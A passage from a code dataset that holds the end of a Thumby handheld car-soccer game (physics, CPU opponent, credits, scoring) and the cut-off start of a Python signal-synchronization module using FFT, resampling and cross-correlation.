thumby.display.drawSprite(self.sprTrails[i])\n \n if ((self.rotate % 2) == 1):\n self.sprCar.setFrame(1)\n elif ((self.rotate % 4) < 2):\n self.sprCar.setFrame(2)\n else:\n self.sprCar.setFrame(0)\n \n self.sprCar.mirrorX = 1 if (((self.rotate+5)%8)<3) else 0 #3,4,5\n self.sprCar.mirrorY = 1 if (((self.rotate+7)%8)<3) else 0 #1,2,3\n self.sprCar.x = round(self.x) - 4\n self.sprCar.y = round(self.y) - 4\n thumby.display.drawSprite(self.sprCar)\n \n ballDrag = 0.9\n \n class Ball:\n x = 0.0\n y = 0.0\n velX = 0.0\n velY = 0.0\n \n player = Car(bmpCarPlayer, bmpsCarPlayer)\n if (gmLinked):\n opponent = Car(bmpCarPlayer, bmpsCarPlayer)\n else:\n opponent = Car(bmpCarOpponent, bmpsCarOpponent)\n ball = Ball()\n \n if (gmLinked and link.mode == 1):\n car1 = opponent\n car2 = player\n else:\n car1 = player\n car2 = opponent\n \n scoreLeft = 0\n scoreRight = 0\n \n aiRotateInterval = [30,20,10][sdAi] if gmCPU else 0\n aiCanBoost = [False,True,True][sdAi] if gmCPU else True\n aiCanReverse = [False,False,True][sdAi] if gmCPU else True\n aiNextRotate = 0\n \n player.allowBoost = True\n opponent.allowBoost = aiCanBoost\n \n countdownFrames = 0\n countdownEnd = 20 * 3 + 10\n \n goal = False\n goalFrame = 0\n goalEnd = 40\n \n #[idle,slow,fast,boost]\n sfxCarHzVariation = 0.25\n sfxCarHzRange = [5.0,10.0,15.0,20.0]\n sfxCarFreqRange = [150,150,200,250]\n sfxCarDuration = 40\n sfxCarNextPlay = 0.0\n \n #[frequency,duration]\n sfxCountdownBeep = [600,200]\n sfxCarBump = [200,50]\n sfxBallKick = [300,100]\n sfxGoalBeep = [800,500]\n \n scoreTabWait = 0\n scoreTabLerp = 1.0\n \n turnAssistRateSlow = 10\n turnAssistRateFast = 5\n turnAssistFrame = 0\n turnAssistL = False\n turnAssistR = False\n \n if (gmCredits):\n creditNames = [\n \"Demod\",\n \"acedent\",\n \"Adrian 2 Cool\",\n \"AyreGuitar\",\n \"hemlockmay\",\n \"JasonTC\",\n \"Laver:na\",\n \"Mason W\",\n \"Oliver2402\",\n \"speedyink\",\n \"SunnyChow\",\n \"TacoTormentor\",\n \"Timendus\",\n \"transistortester\",\n \";;; TurtleMoon ;;;\",\n \"Unimatrix0\",\n \"Vali\",\n \"Windows Vista\",\n \"Xyvir\",\n \"THANK YOU FOR PLAYING ;\"]\n for i in range(1,len(creditNames)-2):\n j = random.randrange(i+1,len(creditNames)-1)\n creditNames[i], creditNames[j] = creditNames[j], creditNames[i]\n \n # BITMAP: width: 50, height: 64 (5x7(8) letters - 0 to z)\n bmpCreditLetters = bytearray([62,81,73,69,62,0,66,127,64,0,66,97,81,73,70,33,65,69,75,49,24,20,18,127,16,47,73,73,73,49,60,74,73,73,48,3,113,9,5,3,54,73,73,73,54,6,73,73,41,30,\n 56,84,86,85,24,12,18,36,18,12,0,0,12,12,0,0,2,0,4,0,2,32,0,8,0,0,4,0,18,0,0,48,52,0,0,124,18,17,18,124,127,73,73,73,54,62,65,65,65,34,\n 127,65,65,34,28,127,73,73,73,65,127,9,9,9,1,62,65,73,73,122,127,8,8,8,127,0,65,127,65,0,32,64,65,63,1,127,8,20,34,65,127,64,64,64,64,127,2,12,2,127,\n 127,4,8,16,127,62,65,65,65,62,127,9,9,9,6,62,65,81,33,94,127,9,25,41,70,70,73,73,73,49,1,1,127,1,1,63,64,64,64,63,31,32,64,32,31,63,64,56,64,63,\n 99,20,8,20,99,7,8,112,8,7,97,81,73,69,67,0,0,12,8,126,127,8,12,0,0,0,8,20,54,21,21,54,20,8,0,30,18,12,18,12,12,18,12,18,30,32,84,84,84,120,\n 127,72,68,68,56,56,68,68,68,40,56,68,68,72,127,56,84,84,84,24,8,126,9,1,2,8,84,84,84,60,127,8,4,4,120,0,68,125,64,0,32,64,68,61,0,0,127,16,40,68,\n 0,65,127,64,0,124,4,24,4,120,124,8,4,4,120,56,68,68,68,56,124,20,20,20,8,8,20,20,24,124,124,8,4,4,8,72,84,84,84,32,4,63,68,64,32,60,64,64,32,124,\n 28,32,64,32,28,60,64,32,64,60,68,40,16,40,68,12,80,80,80,60,68,100,84,76,68,0,0,1,0,0,0,0,64,8,0,1,0,0,0,4,0,24,28,28,0,64,0,0,1,0])\n\n # BITMAP: width: 30, height: 32 (3x4 letters - 0 to z)\n bmpCreditLettersTiny = bytearray([239,249,143,113,239,112,253,153,251,249,157,255,247,148,255,251,153,245,255,157,253,241,81,255,255,189,111,251,155,159,\n 255,25,246,255,155,249,255,85,113,127,217,125,255,82,191,185,159,217,28,248,31,255,130,253,127,136,120,255,195,255,\n 253,162,237,227,174,163,237,175,251,239,233,143,239,89,15,143,233,239,255,41,239,15,217,15,143,217,15,244,74,174,\n 96,143,96,238,198,238,174,66,174,46,202,46,46,229,130,242,149,254,240,158,242,248,158,242,255,154,240,254,152,254])\n\n creditDebrisLetters = [12,13,14,15,16,75,76,77,78,79]\n creditSpecialLetters = [43,45,47]\n \n sprCreditDebris = []\n sprCreditLetters = []\n creditDebrisChance = 20\n creditSpecialChance = 5000\n \n creditsLettersX = 100\n creditsLettersY = 20\n creditsCarMinX = 26.0\n creditsCarMaxX = 46.0\n \n bmpCreditDebris = bytearray(5)\n creditPosition = 0\n creditNextDebrisCheck = 0\n creditRevealedCount = 0\n creditFrame = 0\n \n def resetField():\n global countdownFrames\n \n if (gmLinked):\n random.seed(link.syncFrames)\n \n if (gmTraining):\n ball.x = 40.0 + 16*random.random()\n ball.y = 8.0 + 32*random.random()\n ball.velX = 0.0\n ball.velY = 0.0\n car1.x = 32.0 - 16*random.random()\n car1.y = 8.0 + 32*random.random()\n car1.rotate = 0\n car1.speedShift = 0.0\n countdownFrames = countdownEnd\n \n elif (gmCredits):\n car1.x = 36.0\n car1.y = 20.0\n car1.rotate = 0\n car1.speedShift = 0.0\n countdownFrames = 0\n \n else: # CPU or Linked\n ball.x = 36.0\n ball.y = 20.0\n ball.velX = 0.0\n ball.velY = 0.0\n car1.x = 10.0\n car1.y = 20.0 + (random.random()-0.5)\n car1.rotate = 0\n car1.speedShift = 0.0\n car2.x = 61.0\n car2.y = 20.0 + (random.random()-0.5)\n car2.rotate = 4\n car2.speedShift = 0.0\n countdownFrames = 0\n \n resetField()\n \n thumby.display.setFont(\"/lib/font5x7.bin\", 5, 7, 1)\n \n while(1):\n \n ### INPUTS\n \n if (sdTurnAssist > 0):\n if (sdTurnAssist == 1):\n turnAssistRate = turnAssistRateSlow\n elif (sdTurnAssist == 2):\n turnAssistRate = turnAssistRateFast\n \n if (thumby.buttonL.pressed()):\n turnAssistL = (turnAssistFrame % turnAssistRate) == 0\n turnAssistR = False\n turnAssistFrame += 1\n elif (thumby.buttonR.pressed()):\n turnAssistR = (turnAssistFrame % turnAssistRate) == 0\n turnAssistL = False\n turnAssistFrame += 1\n else:\n turnAssistR = False\n turnAssistL = False\n turnAssistFrame = 0\n \n inputPacket = 0\n if (thumby.buttonL.justPressed() or turnAssistL):\n inputPacket = inputPacket | 0x1\n player.rotate = (player.rotate + 7) % 8\n if (thumby.buttonR.justPressed() or turnAssistR):\n inputPacket = inputPacket | 0x2\n player.rotate = (player.rotate + 1) % 8\n if (thumby.buttonA.pressed()):\n inputPacket = inputPacket | 0x4\n player.gas = 1\n elif (thumby.buttonB.pressed()):\n inputPacket = inputPacket | 0x8\n player.gas = -1\n else:\n player.gas = 0\n \n if (gmLinked):\n linkedInput = link.sync(inputPacket)\n \n if (linkedInput&0x1): #buttonL just pressed\n opponent.rotate = (opponent.rotate + 7) % 8\n if (linkedInput&0x2): #buttonR just pressed\n opponent.rotate = (opponent.rotate + 1) % 8\n if (linkedInput&0x4): #buttonA\n opponent.gas = 1\n elif (linkedInput&0x8): #buttonB\n opponent.gas = -1\n else:\n opponent.gas = 0\n \n ### OPPONENT AI\n \n if (gmCPU):\n # Find target\n if (ball.x < 36):\n ballGoalDir = math.atan2(20-ball.y,-4-ball.x)\n aiTargetX = ball.x - 5 * math.cos(ballGoalDir)\n aiTargetY = ball.y - 5 * math.sin(ballGoalDir)\n else:\n if (opponent.x < ball.x):\n if (opponent.y < 20):\n aiTargetX = ball.x + 4\n aiTargetY = ball.y + 8\n else:\n aiTargetX = ball.x + 4\n aiTargetY = ball.y - 8\n else:\n ballGoalDir = math.atan2(20-ball.y,75-ball.x)\n aiTargetX = ball.x + 5 * math.cos(ballGoalDir)\n aiTargetY = ball.y + 5 * math.sin(ballGoalDir)\n \n aiTargetDir = math.atan2(aiTargetY-opponent.y,aiTargetX-opponent.x)\n aiTargetRotate = round((4 * aiTargetDir) / math.pi)\n \n aiRotateDelta = (aiTargetRotate - opponent.rotate)\n if (aiRotateDelta > 4):\n aiRotateDelta -= 8\n if (aiRotateDelta < -4):\n aiRotateDelta += 8\n \n # Rotate towards target\n if (aiNextRotate > 0):\n aiNextRotate -= 1\n else:\n aiNextRotate = aiRotateInterval\n if (aiRotateDelta > 0):\n opponent.rotate = (opponent.rotate + 1) % 8\n if (aiRotateDelta < 0):\n opponent.rotate = (opponent.rotate + 7) % 8\n \n # Move if we are mostly aligned with target\n if (abs(aiRotateDelta) < 2):\n opponent.gas = 1\n elif (aiCanReverse and abs(aiRotateDelta) > 2):\n opponent.gas = -1\n else:\n opponent.gas = 0\n \n if (countdownFrames < countdownEnd):\n player.gas = 0\n opponent.gas = 0\n \n ### PHYSICS\n \n if (oppExist):\n # Car Collision\n carCarDist = math.sqrt((car2.y-car1.y)**2+(car2.x-car1.x)**2)\n if (carCarDist<7):\n carCarDir = math.atan2(car2.y-car1.y,car2.x-car1.x)\n carCarDx = (7-carCarDist) * math.cos(carCarDir)\n carCarDy = (7-carCarDist) * math.sin(carCarDir)\n car1.x -= carCarDx\n car1.y -= carCarDy\n car2.x += carCarDx\n car2.y += carCarDy\n if (not goal):\n thumbyAudio.audio.play(sfxCarBump[0],sfxCarBump[1])\n \n car1.physicsUpdate()\n if (oppExist):\n car2.physicsUpdate()\n \n if (ballExist):\n ballKick = False\n ballPlayerDist = math.sqrt((ball.y-car1.y)**2+(ball.x-car1.x)**2)\n if (ballPlayerDist < 6):\n ballKick = True\n ballKickX = car1.x\n ballKickY = car1.y\n ballKickSpeed = car1.speed * 1.5\n ballPlayerDir = math.atan2(car1.y-ball.y,car1.x-ball.x)\n car1.x += min(1,(6-ballPlayerDist)) * math.cos(ballPlayerDir)\n car1.y += min(1,(6-ballPlayerDist)) * math.sin(ballPlayerDir)\n \n if (oppExist):\n ballOpponentDist = math.sqrt((ball.y-car2.y)**2+(ball.x-car2.x)**2)\n if (ballOpponentDist < 6):\n if (ballKick):\n ballKickX = (ballKickX + car2.x)/2\n ballKickY = (ballKickY + car2.y)/2\n ballKickSpeed = max(ballKickSpeed, car2.speed * 1.5)\n else:\n ballKick = True\n ballKickX = car2.x\n ballKickY = car2.y\n ballKickSpeed = car2.speed * 1.5\n ballOpponentDir = math.atan2(car2.y-ball.y,car2.x-ball.x)\n car2.x += min(1,(6-ballOpponentDist)) * math.cos(ballOpponentDir)\n car2.y += min(1,(6-ballOpponentDist)) * math.sin(ballOpponentDir)\n \n if (ballKick):\n kickDir = math.atan2(ball.y-ballKickY,ball.x-ballKickX)\n ball.velX = ballKickSpeed * math.cos(kickDir)\n ball.velY = ballKickSpeed * math.sin(kickDir)\n if (not goal):\n thumbyAudio.audio.play(sfxBallKick[0],sfxBallKick[1])\n \n if (ball.y < 12 or ball.y > 28):\n if (ball.x < 4):\n ball.x = 4\n ball.velX = abs(ball.velX)\n if (ball.x > 68):\n ball.x = 68\n ball.velX = -abs(ball.velX)\n if (ball.y < 4):\n ball.y = 4\n ball.velY = abs(ball.velY)\n if (ball.y > 36):\n ball.y = 36\n ball.velY = -abs(ball.velY)\n else:\n if (math.sqrt((ball.y-12)**2+(ball.x)**2) < 4):\n ball.velX = abs(ball.velX)\n ball.velY = abs(ball.velY)\n if (math.sqrt((ball.y-28)**2+(ball.y)**2) < 4):\n ball.velX = abs(ball.velX)\n ball.velY = -abs(ball.velY)\n if (math.sqrt((ball.y-12)**2+(ball.x-71)**2) < 4):\n ball.velX = -abs(ball.velX)\n ball.velY = abs(ball.velY)\n if (math.sqrt((ball.y-28)**2+(ball.x-71)**2) < 4):\n ball.velX = -abs(ball.velX)\n ball.velY = -abs(ball.velY)\n if (ball.x <= -1):\n ball.x = -1\n ball.velX = 0\n if (ball.x >= 72):\n ball.x = 72\n ball.velX = 0\n \n ball.x += ball.velX\n ball.y += ball.velY\n \n ball.velX *= ballDrag\n ball.velY *= ballDrag\n \n ### CREDITS\n \n if (gmCredits):\n creditFrame += 1\n \n creditsShift = 0\n if (player.x < creditsCarMinX and creditPosition > 0):\n creditsShift = round(creditsCarMinX - player.x)\n if (player.x > creditsCarMaxX and creditPosition < len(creditNames)*200 + 100):\n creditsShift = round(creditsCarMaxX - player.x)\n \n creditPosition -= creditsShift\n \n player.x += creditsShift\n for spr in sprCreditDebris:\n spr.x += creditsShift\n for spr in sprCreditLetters:\n spr.x += creditsShift\n for spr in player.sprTrails:\n spr.x += creditsShift\n \n for spr in sprCreditLetters:\n if (not spr.revealed and max(abs(player.x-(spr.x+1)),abs(player.y-(spr.y+1))) < 7):\n spr.revealed = True\n spr.x -= 1\n spr.y -= 1\n spr.width = 5\n spr.height = 7\n spr.bitmap = spr.revealBitmap\n creditRevealedCount += 1\n if (creditRevealedCount == len(sprCreditLetters)):\n for spr2 in sprCreditLetters:\n spr2.origY = spr2.y\n \n if (creditRevealedCount == len(sprCreditLetters)):\n spr.y = round(spr.origY + 2*math.sin((creditPosition + creditFrame + spr.x)/10.0))\n \n if (len(sprCreditDebris) > 0):\n creditNextDebrisCheck = (creditNextDebrisCheck + 1) % len(sprCreditDebris)\n spr = sprCreditDebris[creditNextDebrisCheck]\n if (spr.x + spr.width < -1 or spr.x > 73):\n sprCreditDebris.remove(spr)\n \n if (creditsShift > 0): #Car moving left\n for i in range(creditsShift):\n spawnX = -5 + i\n if (random.randrange(creditDebrisChance) == 0):\n pick = random.choice(creditDebrisLetters)\n bmp = bmpCreditLetters[pick*5:pick*5+5]\n if (sdGrayscale):\n bmp = [bmpCreditDebris,bmp]\n sprCreditDebris.append(thumby.Sprite(5,7,bmp,\n x=spawnX,\n y=random.randrange(33),\n key=0,\n mirrorX=random.getrandbits(1),\n mirrorY=random.getrandbits(1)))\n \n spawnX = -10 + i\n if (random.randrange(creditSpecialChance) == 0):\n pick = random.choice(creditDebrisLetters)\n bmp = bmpCreditLetters[pick*5:pick*5+10]\n if (sdGrayscale):\n bmp = [bmp,bmp]\n sprCreditDebris.append(thumby.Sprite(10,7,bmp,\n x=spawnX,\n y=random.randrange(33),\n key=0))\n \n if (creditsShift < 0): #Car moving right\n for i in range(-creditsShift):\n if ((creditPosition-i) % 200 == 100):\n creditNameIndex = (creditPosition-i) // 200\n if (creditNameIndex >= 0 and creditNameIndex < len(creditNames)):\n sprCreditLetters.clear()\n creditRevealedCount = 0\n creditName = creditNames[creditNameIndex]\n offset = 0\n nameY = 5 + random.randrange(33-10)\n if (creditNameIndex == 0 or creditNameIndex == len(creditNames)-1):\n nameY = 20 - 3\n for letter in creditName:\n if (letter.isspace()):\n offset += 6\n continue\n pick = ord(letter) - 48\n \n col = pick % 10\n row = pick // 20\n bank = (pick % 20) // 10\n bmpOffset = (row * 10 + col) * 3\n bmpTiny = bmpCreditLettersTiny[bmpOffset:bmpOffset+3]\n for j in range(len(bmpTiny)):\n if (bank == 1):\n bmpTiny[j] = bmpTiny[j] >> 4\n \n bmp = bmpCreditLetters[pick*5:pick*5+5]\n spr = thumby.Sprite(3,4,bmpTiny,\n x=72+offset+1,y=nameY+1,\n key=0)\n spr.revealBitmap = bmp\n spr.revealed = False\n sprCreditLetters.append(spr)\n offset += 6\n \n spawnX = 72 - i\n if (random.randrange(creditDebrisChance) == 0):\n pick = random.choice(creditDebrisLetters)\n bmp = bmpCreditLetters[pick*5:pick*5+5]\n if (sdGrayscale):\n bmp = [bmpCreditDebris,bmp]\n sprCreditDebris.append(thumby.Sprite(5,7,bmp,\n x=spawnX,\n y=random.randrange(33),\n key=0,\n mirrorX=random.getrandbits(1),\n mirrorY=random.getrandbits(1)))\n \n if (random.randrange(creditSpecialChance) == 0):\n pick = random.choice(creditSpecialLetters)\n bmp = bmpCreditLetters[pick*5:pick*5+10]\n if (sdGrayscale):\n bmp = [bmp,bmp]\n sprCreditDebris.append(thumby.Sprite(10,7,bmp,\n x=spawnX,\n y=random.randrange(33),\n key=0))\n \n ### SCORING\n \n if (ballExist and not goal):\n if (ball.x <= -1 or ball.x >= 72):\n if (ball.x < 36):\n scoreRight += 1\n goalDirection = 1\n if (gmCPU):\n goalText = \"CPU Scored!\"\n else:\n goalText = \"P2 Scored!\"\n else:\n scoreLeft += 1\n goalDirection = -1\n goalText = \"P1 Scored!\"\n \n if (gmTraining):\n resetField()\n else:\n goal = True\n goalFrame = 0\n \n thumbyAudio.audio.play(sfxGoalBeep[0],sfxGoalBeep[1])\n \n ### SOUND\n \n if (sdSound):\n if (player.speedShift == 0.0): #Idle\n sfxCarHz = sfxCarHzRange[0]\n sfxCarFreq = sfxCarFreqRange[0]\n elif (player.speedShift == 1.0): #Boost\n sfxCarHz = sfxCarHzRange[3]\n sfxCarFreq = sfxCarFreqRange[3]\n else:\n sfxCarLerp = player.speedShift\n sfxCarHz = round(lerp(sfxCarHzRange[1],sfxCarHzRange[2],sfxCarLerp))\n sfxCarFreq = round(lerp(sfxCarFreqRange[1],sfxCarFreqRange[2],sfxCarLerp))\n if (thumbyAudio.audio.pwm.duty_u16() == 0): #Not playing anything\n if (sfxCarNextPlay <= 0.0):\n variation = random.uniform(1.0-sfxCarHzVariation,1.0+sfxCarHzVariation)\n thumbyAudio.audio.play(round(variation * sfxCarFreq), sfxCarDuration)\n sfxCarNextPlay += variation / sfxCarHz\n sfxCarNextPlay -= 0.0333 # 1/30\n \n ### DISPLAY\n \n thumby.display.fill(0)\n \n if (ballExist):\n ballRoundX = round(ball.x)\n ballRoundY = round(ball.y)\n sprBallTex.x = ballRoundX - 9 + (ballRoundX % 6)\n sprBallTex.y = ballRoundY - 9 + (ballRoundY % 6)\n thumby.display.drawSprite(sprBallTex)\n sprBallVoid.x = ballRoundX - 9\n sprBallVoid.y = ballRoundY - 9\n thumby.display.drawSprite(sprBallVoid)\n sprBallOutline.x = ballRoundX - 4\n sprBallOutline.y = ballRoundY - 4\n thumby.display.drawSprite(sprBallOutline)\n \n #thumby.display.blit(bmpTrails[1], round(aiTargetX)-2,round(aiTargetY)-2,4,4,0,0,0);\n \n if (gmCredits):\n for spr in sprCreditDebris:\n thumby.display.drawSprite(spr)\n for spr in sprCreditLetters:\n thumby.display.drawSprite(spr)\n \n if (oppExist):\n car2.draw()\n car1.draw()\n \n if (goalExist):\n sprGoal.x = 0\n sprGoal.y = 12\n sprGoal.mirrorX = 0\n thumby.display.drawSprite(sprGoal)\n sprGoal.x = 68\n sprGoal.y = 12\n sprGoal.mirrorX = 1\n thumby.display.drawSprite(sprGoal)\n \n if (scoreExist):\n if (oppExist):\n minCarBallY = min(car1.y,car2.y,ball.y)\n else:\n minCarBallY = min(car1.y,ball.y)\n \n if (minCarBallY < 10):\n scoreTabWait = 30\n scoreTabLerp = max(0,scoreTabLerp-0.1)\n else:\n if (scoreTabWait > 0):\n scoreTabWait -= 1\n else:\n scoreTabLerp = min(1,scoreTabLerp+0.1)\n \n if (sdGrayscale):\n scoreTabY = round(lerp(-7,0,scoreTabLerp))\n else:\n scoreTabY = round(lerp(-8,0,scoreTabLerp))\n thumby.display.blit(bmpScoreTab,14,scoreTabY,15,8,0,0,0)\n thumby.display.blit(bmpScoreTab,43,scoreTabY,15,8,0,0,0)\n \n sprDigit.y = scoreTabY + 1\n sprDigit.x = 18\n sprDigit.bitmap = bmpDigits[(scoreLeft//10) % 10]\n thumby.display.drawSprite(sprDigit)\n sprDigit.x = 22\n sprDigit.bitmap = bmpDigits[scoreLeft % 10]\n thumby.display.drawSprite(sprDigit)\n sprDigit.x = 47\n sprDigit.bitmap = bmpDigits[(scoreRight//10) % 10]\n thumby.display.drawSprite(sprDigit)\n sprDigit.x = 51\n sprDigit.bitmap = bmpDigits[scoreRight % 10]\n thumby.display.drawSprite(sprDigit)\n \n if (goal):\n x = round(20*math.tan(goalDirection*((goalFrame+1)/(goalEnd+2) - 0.5)*math.pi))\n thumby.display.drawFilledRectangle(round(x*1.5),20-5,72,10,2)\n thumby.display.drawText(goalText,x+37-3*len(goalText),20-3,0)\n thumby.display.drawText(goalText,x+36-3*len(goalText),20-4,1)\n \n if (goalFrame == goalEnd//2):\n resetField()\n \n if (goalFrame < goalEnd):\n goalFrame += 1\n else:\n goal = False\n \n if (countdownFrames < countdownEnd - 10):\n bmpCountdownAnim[2] = bmpCountdownNumber[countdownFrames//20]\n bmpCountdownAnim[3] = bmpCountdownAnim[2]\n if (countdownFrames < 10):\n countdownY = -16 + 2*countdownFrames\n elif (countdownFrames >= 75):\n countdownY = 0 - (2*countdownFrames-75)\n else:\n countdownY = 0\n if ((countdownFrames % 20)==9):\n thumbyAudio.audio.play(sfxCountdownBeep[0],sfxCountdownBeep[1])\n thumby.display.blit(bmpCountdownAnim[(countdownFrames//4)%5], 28, countdownY, 16, 16, 0, 0, 0)\n \n if (oppExist and (countdownFrames % 10) < 5):\n thumby.display.blit(bmpCountdownArrow, round(player.x) - 4, round(player.y) - 12, 8, 8, 0, 0, 0)\n \n if (countdownFrames < countdownEnd):\n countdownFrames += 1\n \n thumby.display.update()\n\nexcept Exception as e:\n f = open(\"/crash.log\", \"w\")\n f.write(str(e))\n f.close()\n raise e","repo_name":"TinyCircuits/TinyCircuits-Thumby-Games","sub_path":"RocketCup/RocketCup.py","file_name":"RocketCup.py","file_ext":"py","file_size_in_byte":49579,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"52"} +{"seq_id":"21778924638","text":"from __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nimport numpy as np\nimport numba as nb\nimport matplotlib\nmatplotlib.use('wxAgg')\nimport matplotlib.pyplot as plt\nimport scipy.signal\nimport os\nimport csv\nimport sys\nfrom fractions import Fraction\n\nfrom IDESynchronization.ide_csv_conversion.Ide2CsvWrapper import Ide2CsvWrapper\nimport IDESynchronization.ide_csv_conversion.ide_helpers as ide_helpers\n\n\n@nb.njit\ndef xcorr_norm(x, y):\n \"\"\"\n The normalized cross-correlation\n \"\"\"\n total_x = 0\n total_y = 0\n for j in range(len(x)):\n total_x += x[j]\n total_y += y[j]\n x_mean = total_x / len(x)\n y_mean = total_y / len(y)\n\n numerator_sum = 0\n x_sum = 0\n y_sum = 0\n for j in range(len(x)):\n numerator_sum += (x[j] - x_mean) * (y[j] - y_mean)\n x_sum += x[j] ** 2\n y_sum += y[j] ** 2\n\n return numerator_sum / np.sqrt(x_sum * y_sum)\n\n # The below code should be used for a non-compiled implementation\n # return np.sum((x-np.mean(x))*(y-np.mean(y))) / np.sqrt(np.sum(x ** 2) * np.sum(y ** 2))\n\n\n@nb.njit\ndef get_aligned_slices(true_signal, adj_signal, true_signal_times, true_loc, adj_loc):\n \"\"\"\n Align the two data arrays based on the given two locations (having the data at those points line up).\n Both arrays are sliced so that they are the same length.\n\n :param true_signal: An ndarray for the resampled signal data which is 'correct'\n :param adj_signal: An ndarray for the resampled signal data which should be adjusted\n :param true_signal_times: The time data associated with the given true_signal\n :param true_loc: The location in the 'true' signal to align with the given location in the 'adjustable' signal\n :param adj_loc: The location in the 'adjustable' signal to align with the given location in the 'true' signal\n :return: A length three tuple where the first and second element are the true and adjustable signals sliced so that\n every point in one corresponds to a point in the other, and the third element is the time's sliced to correspond to\n the true signal\n \"\"\"\n num_left_samples = min(true_loc, adj_loc)\n num_right_samples = min(len(true_signal) - true_loc, len(adj_signal) - adj_loc) - 1\n\n true_signal_slice = slice(true_loc - num_left_samples, true_loc + num_right_samples)\n slice1 = true_signal[true_signal_slice]\n slice2 = adj_signal[adj_loc - num_left_samples: adj_loc + num_right_samples]\n time_slice = true_signal_times[true_signal_slice]\n\n return slice1, slice2, time_slice\n\n\ndef get_sample_period(timestamps):\n return (timestamps[-1] - timestamps[0])/(len(timestamps)-1)\n\n\ndef get_max_freq(channel_data, sample_period, low_freq_range=400, high_freq_range=1500):\n fft_data = np.abs(np.fft.rfft(channel_data))\n fft_freqs = np.fft.rfftfreq(len(channel_data), d=sample_period)\n analysis_freq = fft_freqs[1] - fft_freqs[0]\n low_range = int(low_freq_range / analysis_freq)\n high_range = int(high_freq_range / analysis_freq)\n max_freq_index = low_range + np.argmax(fft_data[low_range:high_range])\n max_freq = fft_freqs[max_freq_index] # USE THIS TO VALIDATE THIS APPROACH AGAINST KNOWN VALUES\n return max_freq\n\n\ndef get_sample_rate_ratio(true_sync, adjust_sync, true_timestep, adjust_timestep, plot_info=False):\n \"\"\"\n Get the ratio of the two sampling rates for the sync signals (after calculating the adjusted sync signal's\n sampling rate)\n\n :param true_sync: The sync data for the 'true' signal\n :param adjust_sync: The sync data for the 'adjustable' signal\n :param true_timestep: The timestep for the 'true' signal\n :param adjust_timestep: The timestep for the 'adjustable' signal\n :param plot_info: A boolean indicating if the true and adjustable signal's FFTs should be plotted with matplotlib\n :return: The ratio of the sampling rates between the true and adjustable signals\n \"\"\"\n true_sync_freq = get_max_freq(true_sync, true_timestep)\n adjust_sync_freq = get_max_freq(adjust_sync, adjust_timestep)\n return true_sync_freq / adjust_sync_freq\n\n\ndef resample_slide_and_compare(true_signal, adj_signal, true_signal_times, samp_rate1, samp_rate2, max_start_offset,\n progress_callback, similarity_metric=None, plot_info=False):\n \"\"\"\n\n :param true_signal: An ndarray for the signal data which is 'correct'\n :param adj_signal: An ndarray for the signal data which should be adjusted\n :param true_signal_times: The time data associated with the given true_signal\n :param samp_rate1: The sampling rate of the first signal\n :param samp_rate2: The sampling rate of the second signal\n :param max_start_offset: The maximum starting time difference to be checked allowed when trying to sync the signals\n :param similarity_metric: A function to be used as the similarity metric, or None which defaults to using the\n normalized cross correlation. The function should take in two ndarrays (the two signals to compare), and output a\n NumPy float32, which should be higher the more similar the two signals are.\n :param plot_info: A boolean value indicating if the resampled data and it's points of interest should be plotted\n by matplotlib\n :return: The same as the return from the allign_location_search function (see it's docstring)\n\n NOTES:\n - The resample function calls are EXTREMELY slow if resampling to a prime number of samlpes (like so slow it'll\n just appear to hang)\n \"\"\"\n MAX_SAMP_RATE_RATIO_DENOMINATOR = int(1e6)\n MIN_LENGTH_MULTIPLIER = 10\n\n if similarity_metric is None:\n similarity_metric = xcorr_norm\n\n # Handle resampling with integer approximations of the sampling rate ratio (This can likely be improved)\n samp_rate_ratio = samp_rate1 / samp_rate2 * len(true_signal) / len(adj_signal)\n\n sample_rate_ratio_approx = Fraction(samp_rate_ratio)\n if samp_rate_ratio > 1:\n sample_rate_ratio_approx = 1/((1/sample_rate_ratio_approx).limit_denominator(MAX_SAMP_RATE_RATIO_DENOMINATOR))\n else:\n sample_rate_ratio_approx = sample_rate_ratio_approx.limit_denominator(MAX_SAMP_RATE_RATIO_DENOMINATOR)\n\n if min(sample_rate_ratio_approx.numerator, sample_rate_ratio_approx.denominator) < MIN_LENGTH_MULTIPLIER * max(len(true_signal), len(adj_signal)):\n scaler_multiplier = int(max(sample_rate_ratio_approx.numerator, sample_rate_ratio_approx.denominator) / (MIN_LENGTH_MULTIPLIER * max(len(true_signal), len(adj_signal))))\n scaler_multiplier = max(1, scaler_multiplier)\n else:\n scaler_multiplier = 1\n\n samp_rate_1_approx = sample_rate_ratio_approx.numerator * scaler_multiplier\n samp_rate_2_approx = sample_rate_ratio_approx.denominator * scaler_multiplier\n\n progress_callback(\"Resampling the signals for consistent frequency\")\n\n # resampled1 = scipy.signal.resample(true_signal, samp_rate_1_approx)\n # resampled2 = scipy.signal.resample(adj_signal, samp_rate_2_approx)\n resampled1 = scipy.signal.resample_poly(true_signal, samp_rate_1_approx, len(true_signal))#, padtype=\"median\")\n resampled2 = scipy.signal.resample_poly(adj_signal, samp_rate_2_approx, len(adj_signal))#, padtype=\"median\")\n\n\n # print(\"Sample rate ratio approximation error:\", samp_rate_ratio - float(sample_rate_ratio_approx))\n\n progress_callback(\"Finding POI (peaks and valleys)\")\n\n # Get the points of interest within the signals\n peaks1 = scipy.signal.find_peaks(resampled1, prominence=1)[0] ############ SHOULD LOOK INTO USING find_peaks_cwt #############\n peaks2 = scipy.signal.find_peaks(resampled2, prominence=1)[0]\n valleys1 = scipy.signal.find_peaks(-resampled1, prominence=1)[0]\n valleys2 = scipy.signal.find_peaks(-resampled2, prominence=1)[0]\n\n # Combine the peaks with the valleys for each signal\n poi1 = np.union1d(peaks1, valleys1)\n poi2 = np.union1d(peaks2, valleys2)\n\n # Get the timestamps associated with resampled1\n # true_signal_times = np.linspace(true_signal_times[0], true_signal_times[-1], len(resampled1)+2)[1:-1]\n true_signal_times = np.linspace(true_signal_times[0], true_signal_times[-1], len(resampled1))\n\n # if plot_info:\n # print(\"%d points of interest in signal 1\\n%d points of intereste in signal 2\"%(len(poi1), len(poi2)))\n # time_step = (true_signal_times[-1] - true_signal_times[0])/(len(resampled1) - 1)\n #\n # plt.plot(resampled1)\n # plt.plot(resampled2)\n # plt.plot(poi1, resampled1[poi1], \"x\")\n # plt.plot(poi2, resampled2[poi2], 'x')\n # plt.xlabel(\"Time Steps (%.5e seconds)\" % time_step)\n # plt.title(\"Resampled Data with Marked POI \")\n # plt.show()\n\n progress_callback(\"Aligning POI pairs for optimal time 